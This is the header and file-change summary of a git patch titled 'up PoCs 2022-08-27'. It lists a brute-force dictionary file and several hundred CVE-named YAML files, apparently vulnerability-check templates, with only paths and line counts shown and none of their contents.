From 7ab1d0c96b1d4c019eecbedc3b46ac931bb3424b Mon Sep 17 00:00:00 2001 From: hktalent <18223385+hktalent@users.noreply.github.com> Date: Sat, 27 Aug 2022 15:39:14 +0800 Subject: [PATCH] up PoCs 2022-08-27 --- brute/dicts/filedic.txt | 4759 ++++++++++++++++- .../cves/2000/CVE-2000-0114.yaml | 2 +- .../cves/2002/CVE-2002-1131.yaml | 2 +- .../cves/2004/CVE-2004-0519.yaml | 2 +- .../cves/2005/CVE-2005-2428.yaml | 2 +- .../cves/2006/CVE-2006-2842.yaml | 2 +- .../cves/2007/CVE-2007-4504.yaml | 2 +- .../cves/2007/CVE-2007-5728.yaml | 2 +- .../cves/2008/CVE-2008-1059.yaml | 2 +- .../cves/2008/CVE-2008-1061.yaml | 2 +- .../cves/2008/CVE-2008-4668.yaml | 2 +- .../cves/2008/CVE-2008-4764.yaml | 2 +- .../cves/2008/CVE-2008-5587.yaml | 2 +- .../cves/2008/CVE-2008-6080.yaml | 2 +- .../cves/2008/CVE-2008-6172.yaml | 2 +- .../cves/2008/CVE-2008-6222.yaml | 2 +- .../cves/2008/CVE-2008-6668.yaml | 2 +- .../cves/2009/CVE-2009-0545.yaml | 2 +- .../cves/2009/CVE-2009-0932.yaml | 2 +- .../cves/2009/CVE-2009-1151.yaml | 4 +- .../cves/2009/CVE-2009-1496.yaml | 2 +- .../cves/2009/CVE-2009-1558.yaml | 2 +- .../cves/2009/CVE-2009-1872.yaml | 2 +- .../cves/2009/CVE-2009-2015.yaml | 2 +- .../cves/2009/CVE-2009-2100.yaml | 2 +- .../cves/2009/CVE-2009-3053.yaml | 2 +- .../cves/2009/CVE-2009-3318.yaml | 2 +- .../cves/2009/CVE-2009-4202.yaml | 2 +- .../cves/2009/CVE-2009-4223.yaml | 2 +- .../cves/2009/CVE-2009-4679.yaml | 2 +- .../cves/2009/CVE-2009-5114.yaml | 2 +- .../cves/2010/CVE-2010-0157.yaml | 2 +- .../cves/2010/CVE-2010-0467.yaml | 2 +- .../cves/2010/CVE-2010-0696.yaml | 2 +- .../cves/2010/CVE-2010-0759.yaml | 2 +- .../cves/2010/CVE-2010-0942.yaml | 2 +- .../cves/2010/CVE-2010-0943.yaml | 2 +- .../cves/2010/CVE-2010-0944.yaml | 2 +- .../cves/2010/CVE-2010-0972.yaml | 2 +- .../cves/2010/CVE-2010-0982.yaml | 2 +- .../cves/2010/CVE-2010-0985.yaml | 2 +- .../cves/2010/CVE-2010-1056.yaml | 2 +- .../cves/2010/CVE-2010-1081.yaml | 2 +- .../cves/2010/CVE-2010-1217.yaml | 2 +- .../cves/2010/CVE-2010-1219.yaml | 2 +- .../cves/2010/CVE-2010-1302.yaml | 2 +- .../cves/2010/CVE-2010-1304.yaml | 2 +- .../cves/2010/CVE-2010-1305.yaml | 2 +- .../cves/2010/CVE-2010-1306.yaml | 2 +- .../cves/2010/CVE-2010-1307.yaml | 2 +- .../cves/2010/CVE-2010-1308.yaml | 2 +- .../cves/2010/CVE-2010-1312.yaml | 2 +- .../cves/2010/CVE-2010-1313.yaml | 2 +- .../cves/2010/CVE-2010-1314.yaml | 2 +- .../cves/2010/CVE-2010-1315.yaml | 2 +- .../cves/2010/CVE-2010-1340.yaml | 2 +- .../cves/2010/CVE-2010-1345.yaml | 2 +- .../cves/2010/CVE-2010-1352.yaml | 2 +- .../cves/2010/CVE-2010-1353.yaml | 2 +- .../cves/2010/CVE-2010-1354.yaml | 2 +- .../cves/2010/CVE-2010-1461.yaml | 2 +- .../cves/2010/CVE-2010-1469.yaml | 2 +- .../cves/2010/CVE-2010-1470.yaml | 2 +- .../cves/2010/CVE-2010-1471.yaml | 2 +- .../cves/2010/CVE-2010-1472.yaml | 2 +- .../cves/2010/CVE-2010-1473.yaml | 2 +- .../cves/2010/CVE-2010-1474.yaml | 2 +- .../cves/2010/CVE-2010-1475.yaml | 2 +- .../cves/2010/CVE-2010-1476.yaml | 2 +- .../cves/2010/CVE-2010-1478.yaml | 2 +- .../cves/2010/CVE-2010-1491.yaml | 2 +- .../cves/2010/CVE-2010-1494.yaml | 2 +- .../cves/2010/CVE-2010-1495.yaml | 2 +- .../cves/2010/CVE-2010-1531.yaml | 2 +- .../cves/2010/CVE-2010-1532.yaml | 2 +- .../cves/2010/CVE-2010-1533.yaml | 2 +- .../cves/2010/CVE-2010-1534.yaml | 2 +- .../cves/2010/CVE-2010-1535.yaml | 2 +- .../cves/2010/CVE-2010-1540.yaml | 2 +- .../cves/2010/CVE-2010-1601.yaml | 2 +- .../cves/2010/CVE-2010-1602.yaml | 2 +- .../cves/2010/CVE-2010-1603.yaml | 2 +- .../cves/2010/CVE-2010-1607.yaml | 2 +- .../cves/2010/CVE-2010-1653.yaml | 2 +- .../cves/2010/CVE-2010-1657.yaml | 2 +- .../cves/2010/CVE-2010-1658.yaml | 2 +- .../cves/2010/CVE-2010-1659.yaml | 2 +- .../cves/2010/CVE-2010-1714.yaml | 2 +- .../cves/2010/CVE-2010-1715.yaml | 2 +- .../cves/2010/CVE-2010-1717.yaml | 2 +- .../cves/2010/CVE-2010-1718.yaml | 2 +- .../cves/2010/CVE-2010-1719.yaml | 2 +- .../cves/2010/CVE-2010-1722.yaml | 2 +- .../cves/2010/CVE-2010-1723.yaml | 2 +- .../cves/2010/CVE-2010-1858.yaml | 2 +- .../cves/2010/CVE-2010-1870.yaml | 2 +- .../cves/2010/CVE-2010-1875.yaml | 2 +- .../cves/2010/CVE-2010-1878.yaml | 2 +- .../cves/2010/CVE-2010-1952.yaml | 2 +- .../cves/2010/CVE-2010-1953.yaml | 2 +- .../cves/2010/CVE-2010-1954.yaml | 2 +- .../cves/2010/CVE-2010-1955.yaml | 2 +- .../cves/2010/CVE-2010-1956.yaml | 2 +- .../cves/2010/CVE-2010-1957.yaml | 2 +- .../cves/2010/CVE-2010-1977.yaml | 2 +- .../cves/2010/CVE-2010-1979.yaml | 2 +- .../cves/2010/CVE-2010-1980.yaml | 2 +- .../cves/2010/CVE-2010-1981.yaml | 2 +- .../cves/2010/CVE-2010-1982.yaml | 2 +- .../cves/2010/CVE-2010-1983.yaml | 2 +- .../cves/2010/CVE-2010-2033.yaml | 2 +- .../cves/2010/CVE-2010-2034.yaml | 2 +- .../cves/2010/CVE-2010-2035.yaml | 2 +- .../cves/2010/CVE-2010-2036.yaml | 2 +- .../cves/2010/CVE-2010-2037.yaml | 2 +- .../cves/2010/CVE-2010-2045.yaml | 2 +- .../cves/2010/CVE-2010-2050.yaml | 2 +- .../cves/2010/CVE-2010-2122.yaml | 2 +- .../cves/2010/CVE-2010-2128.yaml | 2 +- .../cves/2010/CVE-2010-2259.yaml | 2 +- .../cves/2010/CVE-2010-2307.yaml | 2 +- .../cves/2010/CVE-2010-2507.yaml | 2 +- .../cves/2010/CVE-2010-2680.yaml | 2 +- .../cves/2010/CVE-2010-2682.yaml | 2 +- .../cves/2010/CVE-2010-2857.yaml | 2 +- .../cves/2010/CVE-2010-2861.yaml | 2 +- .../cves/2010/CVE-2010-2918.yaml | 2 +- .../cves/2010/CVE-2010-2920.yaml | 2 +- .../cves/2010/CVE-2010-3203.yaml | 2 +- .../cves/2010/CVE-2010-3426.yaml | 2 +- .../cves/2010/CVE-2010-4231.yaml | 2 +- .../cves/2010/CVE-2010-4282.yaml | 2 +- .../cves/2010/CVE-2010-4617.yaml | 2 +- .../cves/2010/CVE-2010-4719.yaml | 2 +- .../cves/2010/CVE-2010-4769.yaml | 2 +- .../cves/2010/CVE-2010-4977.yaml | 2 +- .../cves/2010/CVE-2010-5028.yaml | 2 +- .../cves/2010/CVE-2010-5278.yaml | 2 +- .../cves/2010/CVE-2010-5286.yaml | 2 +- .../cves/2011/CVE-2011-0049.yaml | 2 +- .../cves/2011/CVE-2011-1669.yaml | 2 +- .../cves/2011/CVE-2011-2744.yaml | 2 +- .../cves/2011/CVE-2011-3315.yaml | 2 +- .../cves/2011/CVE-2011-4336.yaml | 2 +- .../cves/2011/CVE-2011-4804.yaml | 2 +- .../cves/2012/CVE-2012-0392.yaml | 2 +- .../cves/2012/CVE-2012-0896.yaml | 2 +- .../cves/2012/CVE-2012-0901.yaml | 2 +- .../cves/2012/CVE-2012-0981.yaml | 2 +- .../cves/2012/CVE-2012-0991.yaml | 2 +- .../cves/2012/CVE-2012-0996.yaml | 2 +- .../cves/2012/CVE-2012-1226.yaml | 2 +- .../cves/2012/CVE-2012-1823.yaml | 2 +- .../cves/2012/CVE-2012-2371.yaml | 2 +- .../cves/2012/CVE-2012-3153.yaml | 2 +- .../cves/2012/CVE-2012-4253.yaml | 2 +- .../cves/2012/CVE-2012-4273.yaml | 2 +- .../cves/2012/CVE-2012-4547.yaml | 2 +- .../cves/2012/CVE-2012-4768.yaml | 2 +- .../cves/2012/CVE-2012-4878.yaml | 2 +- .../cves/2012/CVE-2012-4889.yaml | 2 +- .../cves/2012/CVE-2012-4940.yaml | 2 +- .../cves/2012/CVE-2012-5913.yaml | 2 +- .../cves/2013/CVE-2013-2248.yaml | 2 +- .../cves/2013/CVE-2013-3526.yaml | 2 +- .../cves/2013/CVE-2013-3827.yaml | 2 +- .../cves/2013/CVE-2013-4117.yaml | 2 +- .../cves/2013/CVE-2013-4625.yaml | 2 +- .../cves/2013/CVE-2013-5528.yaml | 2 +- .../cves/2013/CVE-2013-5979.yaml | 2 +- .../cves/2013/CVE-2013-6281.yaml | 2 +- .../cves/2013/CVE-2013-7091.yaml | 2 +- .../cves/2013/CVE-2013-7240.yaml | 2 +- .../cves/2014/CVE-2014-10037.yaml | 2 +- .../cves/2014/CVE-2014-1203.yaml | 2 +- .../cves/2014/CVE-2014-2323.yaml | 2 +- .../cves/2014/CVE-2014-2383.yaml | 2 +- .../cves/2014/CVE-2014-2908.yaml | 2 +- .../cves/2014/CVE-2014-3120.yaml | 2 +- .../cves/2014/CVE-2014-3206.yaml | 2 +- .../cves/2014/CVE-2014-3704.yaml | 2 +- .../cves/2014/CVE-2014-4535.yaml | 2 +- .../cves/2014/CVE-2014-4536.yaml | 2 +- .../cves/2014/CVE-2014-4539.yaml | 2 +- .../cves/2014/CVE-2014-4544.yaml | 2 +- .../cves/2014/CVE-2014-4550.yaml | 2 +- .../cves/2014/CVE-2014-4558.yaml | 2 +- .../cves/2014/CVE-2014-4561.yaml | 2 +- .../cves/2014/CVE-2014-4592.yaml | 2 +- .../cves/2014/CVE-2014-4942.yaml | 2 +- .../cves/2014/CVE-2014-5111.yaml | 2 +- .../cves/2014/CVE-2014-5258.yaml | 2 +- .../cves/2014/CVE-2014-5368.yaml | 2 +- .../cves/2014/CVE-2014-6308.yaml | 2 +- .../cves/2014/CVE-2014-8682.yaml | 2 +- .../cves/2014/CVE-2014-8799.yaml | 2 +- .../cves/2014/CVE-2014-9094.yaml | 2 +- .../cves/2014/CVE-2014-9119.yaml | 2 +- .../cves/2014/CVE-2014-9444.yaml | 2 +- .../cves/2014/CVE-2014-9606.yaml | 2 +- .../cves/2014/CVE-2014-9607.yaml | 2 +- .../cves/2014/CVE-2014-9608.yaml | 2 +- .../cves/2014/CVE-2014-9609.yaml | 2 +- .../cves/2014/CVE-2014-9614.yaml | 2 +- .../cves/2014/CVE-2014-9615.yaml | 2 +- .../cves/2014/CVE-2014-9617.yaml | 2 +- .../cves/2014/CVE-2014-9618.yaml | 2 +- .../cves/2015/CVE-2015-0554.yaml | 2 +- .../cves/2015/CVE-2015-1000005.yaml | 2 +- .../cves/2015/CVE-2015-1000010.yaml | 2 +- .../cves/2015/CVE-2015-1000012.yaml | 2 +- .../cves/2015/CVE-2015-1503.yaml | 2 +- .../cves/2015/CVE-2015-1579.yaml | 2 +- .../cves/2015/CVE-2015-2067.yaml | 2 +- .../cves/2015/CVE-2015-2068.yaml | 2 +- .../cves/2015/CVE-2015-2080.yaml | 2 +- .../cves/2015/CVE-2015-2166.yaml | 2 +- .../cves/2015/CVE-2015-3224.yaml | 2 +- .../cves/2015/CVE-2015-3306.yaml | 2 +- .../cves/2015/CVE-2015-3337.yaml | 2 +- .../cves/2015/CVE-2015-3648.yaml | 2 +- .../cves/2015/CVE-2015-3897.yaml | 2 +- .../cves/2015/CVE-2015-4127.yaml | 2 +- .../cves/2015/CVE-2015-4414.yaml | 2 +- .../cves/2015/CVE-2015-4632.yaml | 2 +- .../cves/2015/CVE-2015-4666.yaml | 2 +- .../cves/2015/CVE-2015-4668.yaml | 2 +- .../cves/2015/CVE-2015-4694.yaml | 2 +- .../cves/2015/CVE-2015-5354.yaml | 2 +- .../cves/2015/CVE-2015-5461.yaml | 2 +- .../cves/2015/CVE-2015-5471.yaml | 2 +- .../cves/2015/CVE-2015-5531.yaml | 2 +- .../cves/2015/CVE-2015-6477.yaml | 2 +- .../cves/2015/CVE-2015-6920.yaml | 2 +- .../cves/2015/CVE-2015-7377.yaml | 2 +- .../cves/2015/CVE-2015-7780.yaml | 2 +- .../cves/2015/CVE-2015-7823.yaml | 2 +- .../cves/2015/CVE-2015-8399.yaml | 2 +- .../cves/2015/CVE-2015-9414.yaml | 2 +- .../cves/2015/CVE-2015-9480.yaml | 2 +- .../cves/2016/CVE-2016-1000139.yaml | 2 +- .../cves/2016/CVE-2016-1000142.yaml | 2 +- .../cves/2016/CVE-2016-1000148.yaml | 2 +- .../cves/2016/CVE-2016-10033.yaml | 2 +- .../cves/2016/CVE-2016-10134.yaml | 2 +- .../cves/2016/CVE-2016-10924.yaml | 2 +- .../cves/2016/CVE-2016-10940.yaml | 2 +- .../cves/2016/CVE-2016-1555.yaml | 2 +- .../cves/2016/CVE-2016-2004.yaml | 2 +- .../cves/2016/CVE-2016-2389.yaml | 2 +- .../cves/2016/CVE-2016-3088.yaml | 2 +- .../cves/2016/CVE-2016-3978.yaml | 2 +- .../cves/2016/CVE-2016-4977.yaml | 2 +- .../cves/2016/CVE-2016-5649.yaml | 2 +- .../cves/2016/CVE-2016-7552.yaml | 2 +- .../cves/2016/CVE-2016-8527.yaml | 2 +- .../cves/2017/CVE-2017-0929.yaml | 2 +- .../cves/2017/CVE-2017-1000028.yaml | 2 +- .../cves/2017/CVE-2017-1000170.yaml | 2 +- .../cves/2017/CVE-2017-10271.yaml | 2 +- .../cves/2017/CVE-2017-10974.yaml | 2 +- .../cves/2017/CVE-2017-11512.yaml | 2 +- .../cves/2017/CVE-2017-11610.yaml | 2 +- .../cves/2017/CVE-2017-12149.yaml | 2 +- .../cves/2017/CVE-2017-12542.yaml | 2 +- .../cves/2017/CVE-2017-12615.yaml | 2 +- .../cves/2017/CVE-2017-12629.yaml | 2 +- .../cves/2017/CVE-2017-14135.yaml | 2 +- .../cves/2017/CVE-2017-14535.yaml | 2 +- .../cves/2017/CVE-2017-15287.yaml | 2 +- .../cves/2017/CVE-2017-15363.yaml | 2 +- .../cves/2017/CVE-2017-15647.yaml | 2 +- .../cves/2017/CVE-2017-15715.yaml | 2 +- .../cves/2017/CVE-2017-15944.yaml | 2 +- .../cves/2017/CVE-2017-16806.yaml | 2 +- .../cves/2017/CVE-2017-17043.yaml | 2 +- .../cves/2017/CVE-2017-17059.yaml | 2 +- .../cves/2017/CVE-2017-17451.yaml | 2 +- .../cves/2017/CVE-2017-17562.yaml | 2 +- .../cves/2017/CVE-2017-18024.yaml | 2 +- .../cves/2017/CVE-2017-18536.yaml | 2 +- .../cves/2017/CVE-2017-18598.yaml | 2 +- .../cves/2017/CVE-2017-3506.yaml | 2 +- .../cves/2017/CVE-2017-3528.yaml | 2 +- .../cves/2017/CVE-2017-3881.yaml | 2 +- .../cves/2017/CVE-2017-5487.yaml | 2 +- .../cves/2017/CVE-2017-5631.yaml | 2 +- .../cves/2017/CVE-2017-5638.yaml | 2 +- .../cves/2017/CVE-2017-5982.yaml | 2 +- .../cves/2017/CVE-2017-6090.yaml | 2 +- .../cves/2017/CVE-2017-7615.yaml | 2 +- .../cves/2017/CVE-2017-9833.yaml | 2 +- .../cves/2018/CVE-2018-0296.yaml | 2 +- .../cves/2018/CVE-2018-1000533.yaml | 2 +- .../cves/2018/CVE-2018-1000861.yaml | 2 +- .../cves/2018/CVE-2018-10093.yaml | 2 +- .../cves/2018/CVE-2018-10201.yaml | 2 +- .../cves/2018/CVE-2018-10822.yaml | 2 +- .../cves/2018/CVE-2018-10823.yaml | 2 +- .../cves/2018/CVE-2018-10956.yaml | 2 +- .../cves/2018/CVE-2018-11409.yaml | 2 +- .../cves/2018/CVE-2018-12031.yaml | 2 +- .../cves/2018/CVE-2018-12054.yaml | 2 +- .../cves/2018/CVE-2018-12095.yaml | 2 +- .../cves/2018/CVE-2018-12613.yaml | 2 +- .../cves/2018/CVE-2018-12634.yaml | 2 +- .../cves/2018/CVE-2018-12998.yaml | 2 +- .../cves/2018/CVE-2018-1335.yaml | 2 +- .../cves/2018/CVE-2018-13980.yaml | 2 +- .../cves/2018/CVE-2018-14064.yaml | 2 +- .../cves/2018/CVE-2018-14474.yaml | 2 +- .../cves/2018/CVE-2018-14728.yaml | 2 +- .../cves/2018/CVE-2018-14916.yaml | 2 +- .../cves/2018/CVE-2018-14918.yaml | 2 +- .../cves/2018/CVE-2018-15138.yaml | 2 +- .../cves/2018/CVE-2018-15517.yaml | 2 +- .../cves/2018/CVE-2018-15535.yaml | 2 +- .../cves/2018/CVE-2018-15745.yaml | 2 +- .../cves/2018/CVE-2018-16059.yaml | 2 +- .../cves/2018/CVE-2018-16133.yaml | 2 +- .../cves/2018/CVE-2018-16167.yaml | 2 +- .../cves/2018/CVE-2018-16283.yaml | 2 +- .../cves/2018/CVE-2018-16288.yaml | 2 +- .../cves/2018/CVE-2018-16299.yaml | 2 +- .../cves/2018/CVE-2018-16668.yaml | 2 +- .../cves/2018/CVE-2018-16670.yaml | 2 +- .../cves/2018/CVE-2018-16671.yaml | 2 +- .../cves/2018/CVE-2018-16763.yaml | 2 +- .../cves/2018/CVE-2018-16836.yaml | 2 +- .../cves/2018/CVE-2018-17246.yaml | 2 +- .../cves/2018/CVE-2018-17254.yaml | 2 +- .../cves/2018/CVE-2018-17431.yaml | 2 +- .../cves/2018/CVE-2018-18323.yaml | 2 +- .../cves/2018/CVE-2018-18775.yaml | 2 +- .../cves/2018/CVE-2018-18777.yaml | 2 +- .../cves/2018/CVE-2018-18925.yaml | 2 +- .../cves/2018/CVE-2018-19136.yaml | 2 +- .../cves/2018/CVE-2018-19326.yaml | 2 +- .../cves/2018/CVE-2018-19439.yaml | 2 +- .../cves/2018/CVE-2018-19458.yaml | 2 +- .../cves/2018/CVE-2018-19749.yaml | 2 +- .../cves/2018/CVE-2018-19751.yaml | 2 +- .../cves/2018/CVE-2018-19752.yaml | 2 +- .../cves/2018/CVE-2018-19753.yaml | 2 +- .../cves/2018/CVE-2018-19877.yaml | 2 +- .../cves/2018/CVE-2018-19892.yaml | 2 +- .../cves/2018/CVE-2018-19914.yaml | 2 +- .../cves/2018/CVE-2018-19915.yaml | 2 +- .../cves/2018/CVE-2018-20009.yaml | 2 +- .../cves/2018/CVE-2018-20010.yaml | 2 +- .../cves/2018/CVE-2018-20011.yaml | 2 +- .../cves/2018/CVE-2018-20463.yaml | 2 +- .../cves/2018/CVE-2018-20470.yaml | 2 +- .../cves/2018/CVE-2018-20526.yaml | 2 +- .../cves/2018/CVE-2018-2392.yaml | 2 +- .../cves/2018/CVE-2018-2791.yaml | 2 +- .../cves/2018/CVE-2018-2894.yaml | 2 +- .../cves/2018/CVE-2018-3714.yaml | 2 +- .../cves/2018/CVE-2018-3760.yaml | 2 +- .../cves/2018/CVE-2018-3810.yaml | 2 +- .../cves/2018/CVE-2018-5316.yaml | 2 +- .../cves/2018/CVE-2018-5715.yaml | 2 +- .../cves/2018/CVE-2018-6008.yaml | 2 +- .../cves/2018/CVE-2018-7251.yaml | 2 +- .../cves/2018/CVE-2018-7422.yaml | 2 +- .../cves/2018/CVE-2018-7467.yaml | 2 +- .../cves/2018/CVE-2018-7490.yaml | 2 +- .../cves/2018/CVE-2018-7600.yaml | 2 +- .../cves/2018/CVE-2018-7602.yaml | 2 +- .../cves/2018/CVE-2018-7719.yaml | 2 +- .../cves/2018/CVE-2018-8719.yaml | 2 +- .../cves/2018/CVE-2018-8727.yaml | 2 +- .../cves/2018/CVE-2018-8770.yaml | 2 +- .../cves/2018/CVE-2018-9118.yaml | 2 +- .../cves/2018/CVE-2018-9161.yaml | 2 +- .../cves/2018/CVE-2018-9205.yaml | 2 +- .../cves/2018/CVE-2018-9995.yaml | 2 +- .../cves/2019/CVE-2019-0193.yaml | 2 +- .../cves/2019/CVE-2019-0221.yaml | 2 +- .../cves/2019/CVE-2019-0230.yaml | 2 +- .../cves/2019/CVE-2019-10068.yaml | 2 +- .../cves/2019/CVE-2019-10475.yaml | 2 +- .../cves/2019/CVE-2019-10758.yaml | 4 +- .../cves/2019/CVE-2019-11013.yaml | 2 +- .../cves/2019/CVE-2019-11370.yaml | 2 +- .../cves/2019/CVE-2019-11869.yaml | 2 +- .../cves/2019/CVE-2019-12314.yaml | 2 +- .../cves/2019/CVE-2019-12616.yaml | 2 +- .../cves/2019/CVE-2019-12962.yaml | 2 +- .../cves/2019/CVE-2019-13101.yaml | 2 +- .../cves/2019/CVE-2019-13396.yaml | 2 +- .../cves/2019/CVE-2019-14312.yaml | 2 +- .../cves/2019/CVE-2019-14322.yaml | 2 +- .../cves/2019/CVE-2019-14470.yaml | 2 +- .../cves/2019/CVE-2019-14696.yaml | 2 +- .../cves/2019/CVE-2019-14974.yaml | 2 +- .../cves/2019/CVE-2019-15107.yaml | 2 +- .../cves/2019/CVE-2019-15501.yaml | 2 +- .../cves/2019/CVE-2019-15713.yaml | 2 +- .../cves/2019/CVE-2019-15811.yaml | 2 +- .../cves/2019/CVE-2019-15859.yaml | 2 +- .../cves/2019/CVE-2019-16123.yaml | 2 +- .../cves/2019/CVE-2019-16278.yaml | 2 +- .../cves/2019/CVE-2019-16525.yaml | 2 +- .../cves/2019/CVE-2019-1653.yaml | 2 +- .../cves/2019/CVE-2019-16759.yaml | 2 +- .../cves/2019/CVE-2019-16931.yaml | 2 +- .../cves/2019/CVE-2019-16932.yaml | 2 +- .../cves/2019/CVE-2019-17270.yaml | 2 +- .../cves/2019/CVE-2019-17382.yaml | 2 +- .../cves/2019/CVE-2019-17503.yaml | 2 +- .../cves/2019/CVE-2019-18371.yaml | 2 +- .../cves/2019/CVE-2019-18818.yaml | 2 +- .../cves/2019/CVE-2019-18922.yaml | 2 +- .../cves/2019/CVE-2019-19134.yaml | 2 +- .../cves/2019/CVE-2019-19368.yaml | 2 +- .../cves/2019/CVE-2019-19985.yaml | 2 +- .../cves/2019/CVE-2019-20085.yaml | 2 +- .../cves/2019/CVE-2019-20183.yaml | 2 +- .../cves/2019/CVE-2019-20210.yaml | 2 +- .../cves/2019/CVE-2019-2616.yaml | 2 +- .../cves/2019/CVE-2019-2725.yaml | 2 +- .../cves/2019/CVE-2019-2767.yaml | 2 +- .../cves/2019/CVE-2019-3396.yaml | 2 +- .../cves/2019/CVE-2019-3911.yaml | 2 +- .../cves/2019/CVE-2019-3912.yaml | 2 +- .../cves/2019/CVE-2019-3929.yaml | 2 +- .../cves/2019/CVE-2019-5418.yaml | 2 +- .../cves/2019/CVE-2019-6715.yaml | 2 +- .../cves/2019/CVE-2019-7254.yaml | 2 +- .../cves/2019/CVE-2019-7256.yaml | 2 +- .../cves/2019/CVE-2019-7275.yaml | 2 +- .../cves/2019/CVE-2019-8449.yaml | 2 +- .../cves/2019/CVE-2019-8451.yaml | 2 +- .../cves/2019/CVE-2019-8937.yaml | 2 +- .../cves/2019/CVE-2019-8982.yaml | 2 +- .../cves/2019/CVE-2019-9041.yaml | 2 +- .../cves/2019/CVE-2019-9618.yaml | 2 +- .../cves/2019/CVE-2019-9670.yaml | 2 +- .../cves/2019/CVE-2019-9733.yaml | 2 +- .../cves/2019/CVE-2019-9955.yaml | 2 +- .../cves/2020/CVE-2020-0618.yaml | 2 +- .../cves/2020/CVE-2020-10770.yaml | 2 +- .../cves/2020/CVE-2020-11455.yaml | 2 +- .../cves/2020/CVE-2020-11738.yaml | 2 +- .../cves/2020/CVE-2020-11853.yaml | 2 +- .../cves/2020/CVE-2020-11854.yaml | 2 +- .../cves/2020/CVE-2020-11930.yaml | 2 +- .../cves/2020/CVE-2020-11978.yaml | 2 +- .../cves/2020/CVE-2020-12054.yaml | 2 +- .../cves/2020/CVE-2020-12720.yaml | 2 +- .../cves/2020/CVE-2020-12800.yaml | 2 +- .../cves/2020/CVE-2020-13927.yaml | 2 +- .../cves/2020/CVE-2020-13945.yaml | 2 +- .../cves/2020/CVE-2020-14092.yaml | 2 +- .../cves/2020/CVE-2020-14181.yaml | 2 +- .../cves/2020/CVE-2020-14864.yaml | 2 +- .../cves/2020/CVE-2020-14883.yaml | 2 +- .../cves/2020/CVE-2020-15050.yaml | 2 +- .../cves/2020/CVE-2020-15500.yaml | 2 +- .../cves/2020/CVE-2020-15920.yaml | 2 +- .../cves/2020/CVE-2020-16139.yaml | 2 +- .../cves/2020/CVE-2020-16846.yaml | 2 +- .../cves/2020/CVE-2020-16952.yaml | 2 +- .../cves/2020/CVE-2020-17362.yaml | 2 +- .../cves/2020/CVE-2020-17456.yaml | 2 +- .../cves/2020/CVE-2020-17496.yaml | 2 +- .../cves/2020/CVE-2020-17505.yaml | 2 +- .../cves/2020/CVE-2020-17506.yaml | 2 +- .../cves/2020/CVE-2020-17518.yaml | 2 +- .../cves/2020/CVE-2020-17530.yaml | 2 +- .../cves/2020/CVE-2020-1938.yaml | 2 +- .../cves/2020/CVE-2020-2096.yaml | 2 +- .../cves/2020/CVE-2020-22840.yaml | 2 +- .../cves/2020/CVE-2020-23575.yaml | 2 +- .../cves/2020/CVE-2020-23972.yaml | 2 +- .../cves/2020/CVE-2020-24186.yaml | 2 +- .../cves/2020/CVE-2020-24223.yaml | 2 +- .../cves/2020/CVE-2020-24912.yaml | 2 +- .../cves/2020/CVE-2020-24949.yaml | 2 +- .../cves/2020/CVE-2020-25495.yaml | 2 +- .../cves/2020/CVE-2020-25540.yaml | 2 +- .../cves/2020/CVE-2020-26876.yaml | 2 +- .../cves/2020/CVE-2020-27982.yaml | 2 +- .../cves/2020/CVE-2020-28351.yaml | 2 +- .../cves/2020/CVE-2020-28871.yaml | 2 +- .../cves/2020/CVE-2020-28976.yaml | 2 +- .../cves/2020/CVE-2020-3187.yaml | 2 +- .../cves/2020/CVE-2020-3452.yaml | 2 +- .../cves/2020/CVE-2020-35598.yaml | 2 +- .../cves/2020/CVE-2020-35749.yaml | 2 +- .../cves/2020/CVE-2020-35951.yaml | 2 +- .../cves/2020/CVE-2020-36112.yaml | 2 +- .../cves/2020/CVE-2020-36510.yaml | 2 +- .../cves/2020/CVE-2020-5307.yaml | 2 +- .../cves/2020/CVE-2020-5775.yaml | 2 +- .../cves/2020/CVE-2020-5776.yaml | 2 +- .../cves/2020/CVE-2020-5777.yaml | 2 +- .../cves/2020/CVE-2020-5902.yaml | 2 +- .../cves/2020/CVE-2020-7136.yaml | 2 +- .../cves/2020/CVE-2020-7209.yaml | 2 +- .../cves/2020/CVE-2020-7980.yaml | 2 +- .../cves/2020/CVE-2020-8115.yaml | 2 +- .../cves/2020/CVE-2020-8163.yaml | 2 +- .../cves/2020/CVE-2020-8193.yaml | 2 +- .../cves/2020/CVE-2020-8512.yaml | 2 +- .../cves/2020/CVE-2020-8641.yaml | 2 +- .../cves/2020/CVE-2020-8654.yaml | 2 +- .../cves/2020/CVE-2020-8772.yaml | 2 +- .../cves/2020/CVE-2020-9043.yaml | 2 +- .../cves/2020/CVE-2020-9402.yaml | 2 +- .../cves/2020/CVE-2020-9484.yaml | 2 +- .../cves/2020/CVE-2020-9496.yaml | 2 +- .../cves/2021/CVE-2021-1497.yaml | 2 +- .../cves/2021/CVE-2021-1498.yaml | 2 +- .../cves/2021/CVE-2021-1499.yaml | 2 +- .../cves/2021/CVE-2021-20031.yaml | 2 +- .../cves/2021/CVE-2021-20090.yaml | 2 +- .../cves/2021/CVE-2021-20091.yaml | 2 +- .../cves/2021/CVE-2021-20092.yaml | 2 +- .../cves/2021/CVE-2021-20114.yaml | 2 +- .../cves/2021/CVE-2021-20123.yaml | 2 +- .../cves/2021/CVE-2021-20124.yaml | 2 +- .../cves/2021/CVE-2021-20137.yaml | 2 +- .../cves/2021/CVE-2021-20150.yaml | 2 +- .../cves/2021/CVE-2021-20158.yaml | 2 +- .../cves/2021/CVE-2021-20167.yaml | 2 +- .../cves/2021/CVE-2021-20792.yaml | 2 +- .../cves/2021/CVE-2021-21972.yaml | 2 +- .../cves/2021/CVE-2021-21975.yaml | 2 +- .../cves/2021/CVE-2021-21978.yaml | 2 +- .../cves/2021/CVE-2021-22145.yaml | 2 +- .../cves/2021/CVE-2021-22205.yaml | 2 +- .../cves/2021/CVE-2021-22873.yaml | 2 +- .../cves/2021/CVE-2021-24146.yaml | 2 +- .../cves/2021/CVE-2021-24165.yaml | 2 +- .../cves/2021/CVE-2021-24176.yaml | 2 +- .../cves/2021/CVE-2021-24210.yaml | 2 +- .../cves/2021/CVE-2021-24226.yaml | 2 +- .../cves/2021/CVE-2021-24235.yaml | 2 +- .../cves/2021/CVE-2021-24236.yaml | 2 +- .../cves/2021/CVE-2021-24237.yaml | 2 +- .../cves/2021/CVE-2021-24245.yaml | 2 +- .../cves/2021/CVE-2021-24274.yaml | 2 +- .../cves/2021/CVE-2021-24275.yaml | 2 +- .../cves/2021/CVE-2021-24276.yaml | 2 +- .../cves/2021/CVE-2021-24278.yaml | 2 +- .../cves/2021/CVE-2021-24284.yaml | 2 +- .../cves/2021/CVE-2021-24285.yaml | 2 +- .../cves/2021/CVE-2021-24288.yaml | 2 +- 